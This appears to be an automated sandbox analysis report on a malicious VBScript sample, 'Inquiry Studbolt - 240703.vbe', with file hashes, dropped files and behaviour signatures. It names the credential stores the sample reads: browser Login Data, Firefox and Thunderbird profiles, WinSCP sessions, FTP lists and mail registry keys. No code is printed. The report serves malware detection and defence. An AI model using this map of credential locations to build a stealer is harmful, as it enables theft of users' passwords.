Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Code function: 16_2_007E3675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

16_2_007E3675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000F.00000002.882856308898.0000000020C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 9032, type: MEMORYSTR

ID:	1466653
Product:	CloudBasic
Start time:	08:51:09
Start date:	03.07.2024
Sample:	Inquiry Studbolt - 240703.vbe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	cac00b561578ffb0e2b2b2fd96eec0cd
SHA1:	16ffdf688abd43ccfaa46f24709ade48af5534e7
SHA256:	8876ad4754fb4f61ba5489924603d279dc023f68c1ba847020107a376de9a9ad
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	8AE1FFF147E23D63DB05800F7EBCE477	2CE64031721E4B38D38CAC2568D964708673A1A5	8F50D85B9696F09A95A0AEACEC2B2596499D618D964FC7569A511A9B15496979
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2jggd3f.0gy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhx2myhm.43u.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmx2r0kx.r2f.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi4jvttu.wlo.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Belleric74.Afs	ASCII text, with very long lines (65536), with no line terminators	E51B9946D8F4C3242757F29CE68CF7B2	15180921F60560CB3C28B4194EB13A8AA898F681	C4A205B291209029FB3FBBF0DE0C41FEB9E0C996F268FC30023E207597A9A415
C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	PE32 executable (GUI) Intel 80386, for MS Windows	251E51E2FEDCE8BB82763D39D631EF89	677A3566789D4DA5459A1ECD01A297C261A133A2	2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9

Windows Analysis Report
Inquiry Studbolt - 240703.vbe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Inquiry Studbolt - 240703.vbe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Inquiry Studbolt - 240703.vbe

Malware Threat Intel
Provided by